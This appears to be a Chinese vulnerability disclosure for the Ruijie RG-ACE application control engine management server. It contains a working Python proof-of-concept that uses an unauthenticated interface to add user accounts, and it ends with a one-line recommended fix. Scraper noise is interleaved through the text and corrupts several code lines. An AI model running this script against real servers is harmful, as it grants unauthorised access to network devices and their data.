锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
/ |, K; ]+ M7 @7 p  v
% t2 ?9 H* G+ D+ @9 e
0 @* y- z8 g2 M4 x: }: G测试的具体版本是
( {- {6 g: h5 g, u) @产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730
' z2 T8 j' E- H$ [$ B- m
1 `5 g; e+ S, H# i
漏洞证明：
' M4 n. b0 ^8 Q' g1 e
6 }# X4 `' T2 G3 I( |

* Z% Y" x8 i8 G8 W+ q' V; g

# b5 H7 ^' ~9 D' D3 ?# v1 g
执行脚本
6 F! N! [7 e% ]- q( P  Y#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
* b/ y* K8 ~0 h- Aimport urllib2, urllib,cookielib
: z: O+ x- U; Yurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
# G& g' n8 y1 C6 W3 \( |("useractionname","addButtonValue"),
("useropermanager","userManager"),
" {2 ^7 T2 o3 c' T$ U7 b$ B("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
3 g4 Y5 ^0 f' q! {$ B("trueName","ad"),
("email",""),
("mobilePhone",""),
1 j. ]- \# ^; e* u: z- T("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
% z5 t8 d% z, S
登录，连接设备



/ C7 e* T3 K. s% _9 J8 S
+ h/ M3 o4 u, f' T
默认的管理员admin权限更大点


6 q  C; A: H! a& L! d+ v  A$ X


& q9 j3 l5 M0 M) d" H5 ?4 \/ v, ~修复方案：
) g2 v- I! t1 v6 M# z. a3 e加强对接口的权限验证
; R- M* I; D6 |. v# @1 F9 d2 c